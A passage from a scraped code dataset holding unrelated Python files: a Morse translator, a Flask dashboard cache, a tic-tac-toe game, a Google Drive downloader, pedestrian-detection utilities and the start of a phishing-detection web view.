a1)\n","repo_name":"AIoT-MLSys-Lab/Mercury","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":10009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"42985258692","text":"from english_to_morse_translator import MORSE_CODE_DICT\nimport re\n\ndef decrypt_message(message):\n word = ''\n letter = ''\n sentence = ''\n space = 1\n vals = MORSE_CODE_DICT.values()\n keys = MORSE_CODE_DICT.keys()\n new_dict = dict(zip(vals,keys))\n for symbol in message:\n if not symbol.isspace():\n letter += symbol\n space = 1\n else:\n if space == 1:\n word += new_dict[letter]\n letter = ''\n space += 1\n elif space == 2:\n space = 1\n sentence += word+\" \"\n word = ''\n return sentence+word\n\nfile = open('code.txt','r')\noutput = open('decode.txt','w')\n# print(' '.join(file.read().splitlines()))\n# file.seek(0)\nres = decrypt_message(' '.join(file.read().splitlines()))\nres = re.split('(?<=[.!?]) +',res)\n# \" \".join([sentence.capitalize() for sentence in res])\noutput.write(\" \".join([sentence.capitalize() for sentence in res]))\nfile.close()\noutput.close()\n\n\n\n\n","repo_name":"nikgun1984/Code_Morse_Translator","sub_path":"morse_to_english_translator.py","file_name":"morse_to_english_translator.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7572538495","text":"\"\"\"\n Contains the in memory cache used to increase the FMD performance.\n\"\"\"\nimport datetime\nfrom multiprocessing import Lock\n\nfrom flask_monitoringdashboard.core.rules import get_rules\nfrom flask_monitoringdashboard.database import session_scope\nfrom flask_monitoringdashboard.database.endpoint import (\n get_last_requested,\n get_endpoints_hits,\n get_endpoint_averages,\n update_last_requested,\n)\n\nmemory_cache = {}\nmutex = Lock()\n\n\nclass EndpointInfo(object):\n \"\"\"\n Info about an endpoint that is stored in the memory cache.\n \"\"\"\n\n def __init__(self, last_requested=None, average_duration=None, hits=None):\n # timestamp of the most recent request\n self.last_requested = last_requested\n # all-time average duration\n 
self.average_duration = average_duration if average_duration else 0\n # all-time number of requests\n self.hits = hits if hits else 0\n\n def set_last_requested(self, last_requested):\n with mutex:\n self.last_requested = last_requested\n\n def set_duration(self, duration):\n with mutex:\n self.average_duration = (self.average_duration * self.hits + duration) / float(\n self.hits + 1\n )\n self.hits += 1\n\n def get_duration(self):\n with mutex:\n return self.average_duration\n\n\ndef init_cache():\n \"\"\"\n This should be added to the list of functions that are executed before the first request.\n It initializes the in-memory cache from the db\n \"\"\"\n global memory_cache\n with session_scope() as session:\n last_req_dict = dict(get_last_requested(session))\n hits_dict = dict(get_endpoints_hits(session))\n averages_dict = dict(get_endpoint_averages(session))\n for rule in get_rules():\n memory_cache[rule.endpoint] = EndpointInfo(\n last_requested=last_req_dict.get(rule.endpoint),\n average_duration=averages_dict.get(rule.endpoint),\n hits=hits_dict.get(rule.endpoint),\n )\n\n\ndef update_last_requested_cache(endpoint_name):\n \"\"\"\n Use this instead of updating the last requested to the database.\n \"\"\"\n global memory_cache\n memory_cache.get(endpoint_name).set_last_requested(datetime.datetime.utcnow())\n\n\ndef update_duration_cache(endpoint_name, duration):\n \"\"\"\n Use this together with adding a request to the database.\n \"\"\"\n global memory_cache\n memory_cache.get(endpoint_name).set_last_requested(datetime.datetime.utcnow())\n memory_cache.get(endpoint_name).set_duration(duration)\n\n\ndef get_avg_endpoint(endpoint_name):\n \"\"\"\n Return the average of the request duration for an endpoint.\n \"\"\"\n global memory_cache\n return memory_cache.get(endpoint_name).get_duration()\n\n\ndef get_last_requested_overview():\n \"\"\"\n Get the last requested values from the cache for the overview page.\n \"\"\"\n global memory_cache\n return [(endpoint_name, endpoint_info.last_requested) for endpoint_name, endpoint_info in memory_cache.items]\n\n\ndef flush_cache():\n \"\"\"\n Flushes cache changes to the db. 
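set_duration() above folds a new request into the all-time average without storing individual samples, using the incremental-mean identity. A one-line worked example of that update with illustrative numbers:

avg, hits, new_duration = 20.0, 3, 40.0
avg = (avg * hits + new_duration) / (hits + 1)   # (60 + 40) / 4 = 25.0, hits becomes 4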
To be called at shut down.\n \"\"\"\n global memory_cache\n if not memory_cache:\n return\n with session_scope() as session:\n for endpoint_name, endpoint_info in memory_cache.items():\n if endpoint_info.last_requested:\n update_last_requested(session, endpoint_name, endpoint_info.last_requested)\n","repo_name":"flask-dashboard/Flask-MonitoringDashboard","sub_path":"flask_monitoringdashboard/core/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":717,"dataset":"github-code","pt":"16"} +{"seq_id":"32536531947","text":"from funcoes.dados.banco_de_dados import *\n\nfrom time import sleep\n\np1 = p2 = escolhido = pts_jogador_x = pts_jogador_o = 0\n\n\ndef opcao1_menuprincipal(arq):\n titulo('CRIANDO JOGADORES')\n nome = str(input(f'Nome do Jogador: ')).strip()\n cadastrar(arq, nome, 0)\n jogadores = carregar_arquivo(arq)\n return jogadores\n\n\ndef opcao2_menuprincipal(jogadores, arq, c):\n if len(jogadores) < 2:\n print('Você precisa criar mais Jogador')\n else:\n pronto = escolhadeJogadores(jogadores)\n if pronto:\n op = menuprincipal(['Continuar?', 'Voltar?'], 'Começar a Partida')\n if op == 1:\n opcao_1(c, jogadores)\n atualizaarquivo(arq, jogadores)\n\n\ndef opcao_1(c, jogadores):\n resp = \" \"\n while resp != \"N\":\n duelistas = sorteio(resp, c, jogadores)\n matriz, simbolo = construimatriz3x3()\n mostrajogo(matriz)\n while not finalizando(matriz, duelistas, jogadores):\n simbolo = jogando(matriz, simbolo)\n print('==' * 15)\n sleep(0.3)\n mostrajogo(matriz)\n print(f'FINALIZANDO A {c}ª PARTIDA!')\n sleep(1)\n print('°°' * 20)\n c += 1\n resp = str(input('Quer Continuar? [S/N]')).strip().upper()[0]\n troca_devalores(jogadores, resp, c, trade=True)\n\n\ndef construimatriz3x3():\n \"\"\"\n -> função cria uma traiz 3x3(lista composta) e retorna essa matriz\n para o programa principal na variavel retorno (m)\n param matriz: lista composta(matriz)\n \"\"\"\n matriz = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n simb = 'X'\n return matriz, simb\n\n\ndef mostrajogo(matriz):\n \"\"\"\n -> Função mostrar a matriz\n \"\"\"\n print('+---+---+---+')\n for linha in range(0, 3):\n for coluna in range(0, 3):\n print(f'|{matriz[linha][coluna]:^3}', end='')\n print('|')\n print('+---+---+---+')\n\n\ndef jogando(matriz, simb):\n \"\"\"\n -> função responsável para fazer o pedido da entrada de valor pelo teclado, para assim realizar a troca de\n valores na função ;Troca().\n param simb: valor str de 'O' ou 'X' que vai ser aplicado na matriz.\n param res: valor bool que retornará da função troca().\n param pos: valor int que retornará da função validadorInt() que é aonde o Jogador do momento quer fazer\n seu lance.\n \"\"\"\n res = False\n while not res:\n pos = validadorInt(f'Vai Jogar [{simb}] em qual posição? 
')\n res = troca(matriz, pos, simb)\n if not res:\n if pos < 1 or pos > 0:\n print('ERRO!Digite um valor entre 1 e 9')\n else:\n print('ERRO: Lugar ocupado!')\n else:\n simb = trocajogador(simb)\n return simb\n\n\ndef troca(matriz, posicao, simbolo):\n \"\"\"\n -> função que verifica se o valor do param: 'posicao' está dentro da matriz, caso sim, troca-se o valor\n do param: 'posicao' pelo valor do param: 'simbolo' e retorna um valor 'ok = True'\n OBS: somente haverá subistituicao se for um valor int por str, caso contrário repetirá o pedido do param:\n 'posicao' retronando valor 'ok = False'.\n param posicao: é a entrada de valor int solicitada ao usuário, para que ele informe onde ele quer jogar\n param simbolo: é o valor que subistituirá o número da matriz\n param matriz: é a matriz construída inicialmente por int que ao decorrer do jogo por conta desta função\n terá elementos dela constituída por str.\n \"\"\"\n ok = False\n for linha in range(0, 3):\n for coluna in range(0, 3):\n if matriz[linha][coluna] == posicao:\n matriz[linha][coluna] = simbolo\n ok = True\n return ok\n\n\ndef trocajogador(simbolo):\n \"\"\"\n -> Função que realiza a troca da variante: simbolo de 'X' por 'O' a cada lance realizado com sucesso.\n ou seja a cada troca realizada pela função 'troca()'\n param simbolo: é uma variavel string que vai retornar\n \"\"\"\n if simbolo == 'X':\n simbolo = 'O'\n else:\n simbolo = 'X'\n return simbolo\n\n\ndef finalizando(matriz, duelistas, jogadores):\n \"\"\"\n -> Função responsavel pela validação se a partida terminou ou não, dando um return a cada vez que é chamada\n de 'False' ou 'True' dependendo das regras de finalização do jogo da velha, por tanto quando o jogo chegar\n em uma posição vencedora ou empatadora, o retorno do param acabar = 'True' encerra o loop da partida.\n param vp_x: é o parâmetro boolean responsavel para dizer se o jogador com o simb = 'X' ou não.\n param vp_o: é o parâmetro boolean responsavel para dizer se o jogador com o simb = 'O' ou não.\n param acabar: é o parâmetro boolean que determina se a partida encerrou ou não.\n param empate: é o parâmetro boolean para defenir se houve empate para os jogadores.\n para cont: é o parâmetro que vai ajudar na lógica de definição de encerramento da partida, caso não haja\n mais casas para se jogar, este param contabilizar a possibilidades de jogadas e caso seja int(0) então\n o jogo deve ser encerrado.\n \"\"\"\n global pts_jogador_o, pts_jogador_x\n empate = False\n cont = 0\n acabar, vitoria_do_x, vitoria_do_o = analises(matriz)\n atribuindo_ponto(vitoria_do_x, vitoria_do_o)\n analisando_empate(matriz, cont)\n if acabar:\n if not vitoria_do_x and not vitoria_do_o:\n pts_jogador_x += 0.5\n pts_jogador_o += 0.5\n print('Empatou')\n empate = True\n placar(vitoria_do_x, vitoria_do_o, empate, duelistas, jogadores)\n return acabar\n\n\ndef analisando_empate(matriz, cont):\n acabar = False\n for linha in range(0, 3):\n for coluna in range(0, 3):\n if matriz[linha][coluna] != 'X' and matriz[linha][coluna] != 'O':\n cont += 1\n if cont == 0:\n acabar = True\n return acabar\n\n\ndef analises(matriz):\n acabar = vitoria_do_x = vitoria_do_o = False\n acabar, vitoria_do_x, vitoria_do_o = analisando_linha(matriz, acabar, vitoria_do_x, vitoria_do_o)\n acabar, vitoria_do_x, vitoria_do_o = analisando_coluna(matriz, acabar, vitoria_do_x, vitoria_do_o)\n acabar, vitoria_do_x, vitoria_do_o = analisando_diagonal_pri(matriz, acabar, vitoria_do_x, vitoria_do_o)\n acabar, vitoria_do_x, vitoria_do_o = analisando_diagonal_sec(matriz, 
acabar, vitoria_do_x, vitoria_do_o)\n return acabar, vitoria_do_x, vitoria_do_o\n\n\ndef analisando_linha(matriz, acabar, vitoria_do_x, vitoria_do_o):\n for linha in range(0, 3):\n if matriz[linha][0] == matriz[linha][1] == matriz[linha][2]:\n if matriz[linha][0] == 'X':\n vitoria_do_x = True\n if matriz[linha][0] == 'O':\n vitoria_do_o = True\n acabar = True\n return acabar, vitoria_do_x, vitoria_do_o\n\n\ndef analisando_coluna(matriz, acabar, vitoria_do_x, vitoria_do_o):\n for coluna in range(0, 3):\n if matriz[0][coluna] == matriz[1][coluna] == matriz[2][coluna]:\n if matriz[0][coluna] == 'X':\n vitoria_do_x = True\n if matriz[0][coluna] == 'O':\n vitoria_do_o = True\n acabar = True\n return acabar, vitoria_do_x, vitoria_do_o\n\n\ndef analisando_diagonal_pri(matriz, acabar, vitoria_do_x, vitoria_do_o):\n if matriz[0][0] == matriz[1][1] == matriz[2][2]:\n if matriz[0][0] == 'X':\n vitoria_do_x = True\n if matriz[0][0] == 'O':\n vitoria_do_o = True\n acabar = True\n return acabar, vitoria_do_x, vitoria_do_o\n\n\ndef analisando_diagonal_sec(matriz, acabar, vitoria_do_x, vitoria_do_o):\n if matriz[0][2] == matriz[1][1] == matriz[2][0]:\n if matriz[0][2] == 'X':\n vitoria_do_x = True\n if matriz[0][2] == 'O':\n vitoria_do_o = True\n acabar = True\n return acabar, vitoria_do_x, vitoria_do_o\n\n\ndef atribuindo_ponto(vitoria_do_x, vitoria_do_o):\n global pts_jogador_o, pts_jogador_x\n if vitoria_do_x:\n pts_jogador_x += 1\n elif vitoria_do_o:\n pts_jogador_o += 1\n\n\ndef lin(tam=42):\n return '-'*tam\n\n\ndef titulo(msg):\n \"\"\"\n -> função para definir um título com melhor estética.\n param msg: é a entrada de uma string que vai servir de cabeçalho.\n \"\"\"\n print(lin())\n print(msg.center(42))\n print(lin())\n\n\ndef menuprincipal(lista, msg):\n \"\"\"\n -> funcão a qual dá estrutura ao menu principal dando print() de cada item de uma lista por cada vez que\n realiza um laço de repetição.\n param lista: contem itens (strings) que informam ao usuário de forma interativa suas opções.\n param msg: o conteúdo principal do cabeçalho, para formar o titulo do menu de forma mais estética.\n param c: é uma variavel para definir o índice de opções baseado na quantidade de itens do 'param lista'.\n param r: é a variável solicitada ao usuário para definir sua escolha com base nas informações montada por\n esta função. retornando a variavel 'r' ao programa principal para segmento do programa.\n \"\"\"\n titulo(msg)\n c = 1\n for item in lista:\n print(f'{c} - {item}')\n c += 1\n r = validadorInt('Opção: ')\n return r\n\n\ndef validadorInt(msg):\n \"\"\"\n -> esta função possui o objetivo de validar informações de caracter inteiro. que a priore são usadas nas\n interações do usuário com o menu do programa ou a tabela de jogadores e o tabuleiro do jogo.\n \"\"\"\n ok = False\n while not ok:\n try:\n n = int(input(msg))\n except(TypeError, ValueError):\n print('Digite um número inteiro válido')\n else:\n ok = True\n return n\n\n\ndef escolhadeJogadores(jogadores):\n \"\"\"\n -> esta tem por função selecionar dois jogadores, dos quais estão dentro da lista com os dados de todos os\n jogadores registrados, não podendo jogar participantes com os memos nomes. 
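The analisando_* helpers above check every row, column and both diagonals for three equal symbols. A compact example of the same test on one finished board, written out in English for clarity:

board = [['X', 'O', 3],
         ['O', 'X', 6],
         [7, 8, 'X']]
x_wins = (
    any(row[0] == row[1] == row[2] == 'X' for row in board)
    or any(board[0][c] == board[1][c] == board[2][c] == 'X' for c in range(3))
    or board[0][0] == board[1][1] == board[2][2] == 'X'
    or board[0][2] == board[1][1] == board[2][0] == 'X'
)
print(x_wins)   # True: the main diagonal holds three X marks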
Sendo assim uma condição\n necessária para que a partida comece.\n \"\"\"\n titulo('CARREGAR JOGADORES')\n global p1, p2\n if len(jogadores) == 0:\n print('NÃO HÁ JOGADORES REGISTRADO')\n return False\n for cod, j in enumerate(jogadores):\n print(f'{cod} - {j[\"nome\"]}')\n p1, p2 = validadordejogadores(jogadores)\n jogador1 = jogadores[p1]['nome']\n jogador2 = jogadores[p2]['nome']\n ok = True\n print(f'Os jogadores Escolhido foram \"{jogador1}\" e \"{jogador2}\"')\n return ok\n\n\ndef validadordejogadores(jogadores):\n \"\"\"\n -> esta função não permite que a escolha do jogadores seja feita de forma correta e evitando problemas é\n por tanto um validador de escolha dos jogadores como o próprio nome já diz.\n \"\"\"\n while True:\n player1 = validadorInt('Escolha O primeiro Jogador: ')\n if 0 <= player1 < len(jogadores):\n print(f'O 1ª Jogador é {jogadores[player1][\"nome\"]}')\n break\n while True:\n player2 = validadorInt('Escolha O Segundo Jogador: ')\n if player1 == player2:\n print('ERRO! Você não pode escolher o mesmo jogador!')\n elif 0 <= player2 < len(jogadores):\n print(f'O 2ª Jogador é {jogadores[player2][\"nome\"]}')\n break\n return player1, player2\n\n\ndef sorteio(resposta, contador, jogadores):\n \"\"\"\n -> tem for função sortear quem vai começar a partida e fazer as alterações ou trocas de valores do placar do\n jogador vitorioso de 'X' que na proxima rodada vai ficar com 'O':\n EX: 'Fulano' que está com 'X' e 'zero' pontos\n 'Beltrano que está com 'O' e 'zero' pontos\n e caso 'Fulano' ganhe na próxima partida ele ficará\n 'Fulano' jogando de 'O' está com '1' ponto\n 'Beltrano' jogando de 'X' está com '0' ponto.\n \"\"\"\n global pts_jogador_o, pts_jogador_x\n duelistas = [\"\", \"\"]\n print(lin())\n troca_devalores(jogadores, resposta, contador)\n if contador % 2 != 0:\n duelistas[0] = jogadores[p1][\"nome\"]\n duelistas[1] = jogadores[p2][\"nome\"]\n print(f'{duelistas[0]} vai começar a partida')\n else:\n print(f'{jogadores[p2][\"nome\"]} vai começar a partida')\n duelistas[0] = jogadores[p2][\"nome\"]\n duelistas[1] = jogadores[p1][\"nome\"]\n return duelistas\n\n\ndef troca_devalores(jogadores, resposta, contador, trade=False):\n global pts_jogador_x, pts_jogador_o\n if not trade:\n if resposta == \"S\":\n pts_jogador_o, pts_jogador_x = pts_jogador_x, pts_jogador_o\n jogadores[p1]['ponto'], jogadores[p2]['ponto'] = jogadores[p2]['ponto'], jogadores[p1]['ponto']\n elif trade:\n if resposta == 'N' and contador > 2:\n jogadores[p1]['ponto'], jogadores[p2]['ponto'] = jogadores[p2]['ponto'], jogadores[p1]['ponto']\n\n\ndef placar(vp_x, vp_o, emp, duelistas, jogadores):\n \"\"\"\n -> está função altera o valor (key) 'ponto' do jogador que está dentro da lista de jogadores, caso ganhe\n +1 ponto, caso empate +0.5 para ambos jogadores. 
informando assim o placar temporário e posteriormente\n alterando a lista de jogadores que séra registrada em documento.\n \"\"\"\n print(lin(10))\n print(f'{duelistas[0]} de X: {pts_jogador_x} pts')\n print(f'{duelistas[1]} de O: {pts_jogador_o} pts')\n if vp_x:\n jogadores[p1]['ponto'] += 1\n elif vp_o:\n jogadores[p2]['ponto'] += 1\n elif emp:\n jogadores[p1]['ponto'] += 0.5\n jogadores[p2]['ponto'] += 0.5\n\n\ndef ranking(jogadores):\n \"\"\"\n -> tal função tem por objetivo organizar a lista temporária de jogadores por ordem de maior pontuador até\n o menor pontuador e apresenta-los de forma mais agradavél ao usuário.\n \"\"\"\n for c in range(0, len(jogadores) - 1):\n for i in range(c, len(jogadores)):\n if jogadores[c]['ponto'] < jogadores[i]['ponto']:\n jogadores[c], jogadores[i] = jogadores[i], jogadores[c]\n titulo('RANKING DOS JOGADORES')\n for r, j in enumerate(jogadores):\n print(f'{r+1:}ª - {j[\"nome\"]:.<30} {j[\"ponto\"]} pts')\n print(lin())\n","repo_name":"Felipe-builder/jogo_da_velha","sub_path":"funcoes/logica.py","file_name":"logica.py","file_ext":"py","file_size_in_byte":14025,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29158556382","text":"from googleapiclient.discovery import build\nfrom apiclient.http import MediaFileUpload, MediaIoBaseDownload\nimport io\nimport threading\nimport csv\nimport time\nclass DownloadManager:\n def __init__(self, creds):\n self.creds = creds\n \n def downloadFile(self, fid, fname):\n service = build('drive','v3', credentials=self.creds)\n request = service.files().get_media(fileId=fid)\n fh = io.FileIO('{}.png'.format(fname),'wb')\n downloader = MediaIoBaseDownload(fh, request)\n done = False\n while done is False:\n status, done = downloader.next_chunk()\n print(\"GET: {}\".format(fname)) \n\n\n def getList(self):\n service = build('drive','v3', credentials=self.creds)\n results = service.files().list(\n fields=\"nextPageToken, files(id, name)\").execute()\n items = results.get('files', [])\n itemList = []\n \n if not items:\n print('No files found.')\n else:\n print('Files:')\n for item in items:\n print(u'{0} ({1})'.format(item['name'], item['id']))\n itemList.append({'fname':item['name'], 'fid':item['id']})\n i=0\n with open(\"itemList.csv\", 'w') as f:\n \n fieldnames=['fname','fid']\n fwriter = csv.DictWriter(f,fieldnames=fieldnames)\n for item in itemList:\n i+=1\n fwriter.writerow(item)\n print(\"----------------------------------------------------------\")\n print(\"Action Completed! {} rows written to itemList.csv\".format(i))\n\n def downloadFromListThread(self, filePath):\n itemList = []\n with open(filePath,'r') as csvlist:\n csv_reader = csv.DictReader(csvlist, fieldnames=['fname','fid'])\n for row in csv_reader:\n line = {}\n line['fid']=row['fid']\n line['fname']=row['fname']\n itemList.append(line)\n\n threads = []\n for item in itemList:\n thread = threading.Thread(target=self.downloadFile, args=(item['fid'],item['fname'],)) \n threads.append(thread)\n \n t1 = time.perf_counter()\n i=0\n for thread in threads:\n thread.start()\n print(\"HIT: {}\".format(itemList[i]['fname']))\n i+=1\n \n i=0\n for thread in threads:\n thread.join()\n i+=1\n \n t2 = time.perf_counter()\n print(\"----------------------------------------------------------\")\n print(\"Action Completed! 
{} Files downloaded, {}m {}s Elapsed \".format(i, int((t2-t1)/60), int(t2-t1)%60))\n\n def downloadFromListRegular(self, filePath):\n with open(filePath,'r') as csvlist:\n csv_reader = csv.DictReader(csvlist, fieldnames=['fname','fid'])\n t1 = time.perf_counter()\n i = 0\n for row in csv_reader:\n print(\"HIT: {}\".format(row['fname']))\n self.downloadFile(row['fid'],row['fname'])\n i+=1\n t2 = time.perf_counter()\n print(\"----------------------------------------------------------\")\n print(\"Action Completed! {} Files downloaded, {}m {}s Elapsed \".format(i, int((t2-t1)/60), int(t2-t1)%60))\n \n\n\n\n","repo_name":"maneeshpm/Multithreaded-downloader-for-google-drive-API","sub_path":"DownloadManager.py","file_name":"DownloadManager.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"12784300419","text":"import shutil\nimport xml.etree.ElementTree as et\nfrom pathlib import Path\nfrom typing import List, Optional, NamedTuple\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.utils import load_img, img_to_array\nimport tensorflow.keras.backend as K\n\n\nEFFICIENT_NET_SIZES = ((224,7), (240,7), (260,8), (300,9), (380,11), (456,14), (528,16), (600,18))\n\n\nclass Rectangle(NamedTuple):\n \"\"\"Хранит координаты прямоугольника (xmin, ymin) - (xmax, ymax)\"\"\"\n\n xmin: int\n ymin: int\n xmax: int\n ymax: int\n\n @property\n def w(self) -> int:\n \"\"\"Ширина\"\"\"\n return self.xmax - self.xmin\n\n @property\n def h(self) -> int:\n \"\"\"Высота\"\"\"\n return self.ymax - self.ymin\n\n @property\n def square(self) -> float:\n \"\"\"Площадь\"\"\"\n return self.w * self.h\n\n def __repr(self) -> str:\n return f'Rectangle(x1={self.xmin},y1={self.ymin},x2={self.xmax},y2={self.ymax})'\n\n\nclass Annotation(NamedTuple):\n \"\"\"Аннотация к изображению - bbox + класс объекта\"\"\"\n label: str\n bbox: Rectangle\n\n\nclass AnnotationFileReader:\n \"\"\"Чтение файла с аннотациями из LADD (Pascal VOC)\"\"\"\n\n def __init__(self, filepath: str) -> None:\n self.filepath: Path = Path(filepath)\n\n def read_annotations(self) -> List[Annotation]:\n annotations = []\n root = et.parse(str(self.filepath)).getroot()\n for obj in root.iter('object'):\n bndbox = obj.find('bndbox')\n assert bndbox is not None\n annotation = Annotation(\n label=self._text(obj.find('name'), default=''),\n bbox=Rectangle(\n xmin=int(self._text(bndbox.find('xmin'), default='0')),\n ymin=int(self._text(bndbox.find('ymin'), default='0')),\n xmax=int(self._text(bndbox.find('xmax'), default='0')),\n ymax=int(self._text(bndbox.find('ymax'), default='0')),\n )\n )\n annotations.append(annotation)\n return annotations\n\n def _text(self, element: Optional[et.Element], default: str) -> str:\n if element is None:\n return default\n text = element.text\n if text is None:\n return default\n return text\n\n def __repr__(self) -> str:\n path = str(self.filepath)\n return f\"AnnotationFile('{path}')\"\n\n\ndef scale(src, x_factor, y_factor) -> Annotation:\n \"\"\"Масштабирование координат\"\"\"\n return Annotation(\n label = src.label,\n bbox = Rectangle(\n xmin = round(src.bbox.xmin * x_factor),\n xmax = round(src.bbox.xmax * x_factor),\n ymin = round(src.bbox.ymin * y_factor),\n ymax = round(src.bbox.ymax * y_factor)\n )\n )\n\n\ndef shift(src, x_shift, y_shift) -> Annotation:\n \"\"\"Сдвиг координат\"\"\"\n return Annotation(\n label = src.label,\n bbox = Rectangle(\n xmin = round(src.bbox.xmin - x_shift),\n xmax = 
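downloadFromListThread above spawns one thread per file, which can overwhelm the Drive API on long lists. A hedged alternative sketch using a bounded pool from the standard library; it reuses the downloadFile method defined on DownloadManager, and max_workers=8 is an arbitrary choice:

from concurrent.futures import ThreadPoolExecutor

def download_all(manager, items, max_workers=8):
    # items: [{'fname': ..., 'fid': ...}, ...] as read from itemList.csv
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        futures = [pool.submit(manager.downloadFile, item['fid'], item['fname'])
                   for item in items]
        for future in futures:
            future.result()               # surfaces any download error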
round(src.bbox.xmax - x_shift),\n            ymin = round(src.bbox.ymin - y_shift),\n            ymax = round(src.bbox.ymax - y_shift)\n        )\n    )\n\n\ndef overlap_annotations(scaled_anns, left, top, right, bottom, CROP_SIZE=224) -> List:\n    \"\"\"Пересечение аннотаций с кропом изображения\"\"\"\n    crop_anns = []\n    for ann in scaled_anns:\n        if ann.bbox.xmin >= left and ann.bbox.ymin >= top:\n            if ann.bbox.xmax <= right and ann.bbox.ymax <= bottom:\n                crop_anns.append(shift(ann, left, top))\n            else:\n                if ann.bbox.xmax - right < ann.bbox.w/3 and ann.bbox.ymax - bottom < ann.bbox.h/3:\n                    crop_anns.append(Annotation(label=ann.label, bbox=Rectangle(\n                        xmin=ann.bbox.xmin-left, ymin=ann.bbox.ymin-top, \n                        xmax=min(CROP_SIZE, ann.bbox.xmax-left), ymax=min(CROP_SIZE, ann.bbox.ymax-top))))\n    return crop_anns\n\n\ndef ann_to_numpy(ann):\n    \"\"\"Convert coordinates according to tf bbox output: ymin, xmin, ymax, xmax, 1 - Pedestrian class \"\"\"\n    bb = ann.bbox\n    return np.array((bb.xmin, bb.ymin, bb.xmax, bb.ymax))\n\n\ndef get_feature_map(bboxes, crop_size, fm_size):\n    y = np.zeros((fm_size, fm_size), dtype=np.uint8)\n\n    box_size = crop_size / fm_size\n    \n    for bb in bboxes:\n\n        bx = int(np.floor( ( (bb[0]+bb[2]-1)/2) / box_size))\n        by = int(np.floor( ( (bb[1]+bb[3]-1)/2) / box_size))\n        try:\n            y[by, bx] = 1\n        except IndexError:\n            print(bboxes)\n            print(crop_size)\n\n    return y\n\n\ndef crop_sample(idx, CROP_SIZE, FEATURE_MAP_SIZE, DATA_DIR):\n    \"\"\"Crop image for WxH crops and resize every crop to CROP_SIZE \n    return N crops with annotations\"\"\"\n    N = 4\n    W, H = 4, 3\n\n\n    img_path = DATA_DIR + '/JPEGImages/' + f'{idx}.jpg'\n    img = load_img(img_path)\n    ann_path = DATA_DIR + '/Annotations/' + f'{idx}.xml'\n    anns = AnnotationFileReader(ann_path).read_annotations()\n\n    img_r = img.resize(size=(W*CROP_SIZE, H*CROP_SIZE))\n\n    k_x = W*CROP_SIZE / img.width\n    k_y = H*CROP_SIZE / img.height\n\n    scaled_anns = [scale(a, k_x, k_y) for a in anns]\n    out = []\n\n    for w in range(W):\n        for h in range(H):\n            left = w * CROP_SIZE\n            top = h * CROP_SIZE\n            right = (w+1) * CROP_SIZE\n            bottom = (h+1) * CROP_SIZE\n            \n            crop_img = img_r.crop((left, top, right, bottom))\n            crop_anns = overlap_annotations(scaled_anns, left, top, right, bottom, CROP_SIZE)\n            crop_bboxes = [ann_to_numpy(ann) for ann in crop_anns]\n\n            y = get_feature_map(crop_bboxes, CROP_SIZE, FEATURE_MAP_SIZE)\n            # print(y.sum())\n            out.append(\n                ((w,h),\n                img_to_array(crop_img, dtype=np.uint8),\n                y,\n                crop_anns\n                )\n            )\n\n    return sorted(out, key=lambda x: x[2].sum(), reverse=True)[:N]\n\n\n@tf.function\ndef focal_loss(\n    y_true,\n    y_pred,\n    alpha = 0.25,\n    gamma = 2.0,\n    from_logits = False,\n) -> tf.Tensor:\n    \"\"\"Implements the focal loss function.\n    Focal loss was first introduced in the RetinaNet paper\n    (https://arxiv.org/pdf/1708.02002.pdf). Focal loss is extremely useful for\n    classification when you have highly imbalanced classes. It down-weights\n    well-classified examples and focuses on hard examples. The loss value is\n    much higher for a sample which is misclassified by the classifier as compared\n    to the loss value corresponding to a well-classified example. One of the\n    best use-cases of focal loss is its usage in object detection where the\n    imbalance between the background class and other classes is extremely high.\n    Args:\n        y_true: true targets tensor.\n        y_pred: predictions tensor.\n        alpha: balancing factor.\n        gamma: modulating factor.\n    Returns:\n        Weighted loss float `Tensor`. 
If `reduction` is `NONE`,this has the\n same shape as `y_true`; otherwise, it is scalar.\n \"\"\"\n if gamma and gamma < 0:\n raise ValueError(\"Value of gamma should be greater than or equal to zero.\")\n\n y_pred = tf.convert_to_tensor(y_pred)\n y_true = tf.cast(y_true, dtype=y_pred.dtype)\n\n # Get the cross_entropy for each entry\n ce = K.binary_crossentropy(y_true, y_pred, from_logits=from_logits)\n\n # If logits are provided then convert the predictions into probabilities\n if from_logits:\n pred_prob = tf.sigmoid(y_pred)\n else:\n pred_prob = y_pred\n\n p_t = (y_true * pred_prob) + ((1 - y_true) * (1 - pred_prob))\n alpha_factor = 1.0\n modulating_factor = 1.0\n\n if alpha:\n alpha = tf.cast(alpha, dtype=y_true.dtype)\n alpha_factor = y_true * alpha + (1 - y_true) * (1 - alpha)\n\n if gamma:\n gamma = tf.cast(gamma, dtype=y_true.dtype)\n modulating_factor = tf.pow((1.0 - p_t), gamma)\n\n # compute the final loss and return\n return tf.reduce_sum(alpha_factor * modulating_factor * ce)\n\n\n","repo_name":"balezz/LacmusTflite","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9623795112","text":"from django.shortcuts import render, redirect\r\nimport pandas as pd\r\nimport pickle\r\n\r\ndef index_func(request):\r\n res = 0\r\n if request.method == 'POST':\r\n name = request.POST['name']\r\n NumDots = request.POST['NumDots']\r\n PathLevel = request.POST['PathLevel']\r\n NumDash = request.POST['NumDash']\r\n NumSensitiveWords= request.POST['NumSensitiveWords']\r\n PctExtHyperlinks = request.POST['PctExtHyperlinks']\r\n PctExtResourceUrls= request.POST['PctExtResourceUrls']\r\n InsecureForms = request.POST['InsecureForms']\r\n tooLong = request.POST['PctNullSelfRedirectHyperlinks']\r\n freq = request.POST['FrequentDomainNameMismatch']\r\n SubmitInfoToEmail = request.POST['SubmitInfoToEmail']\r\n IframeOrFrame = request.POST['IframeOrFrame']\r\n\r\n if name != \"\":\r\n 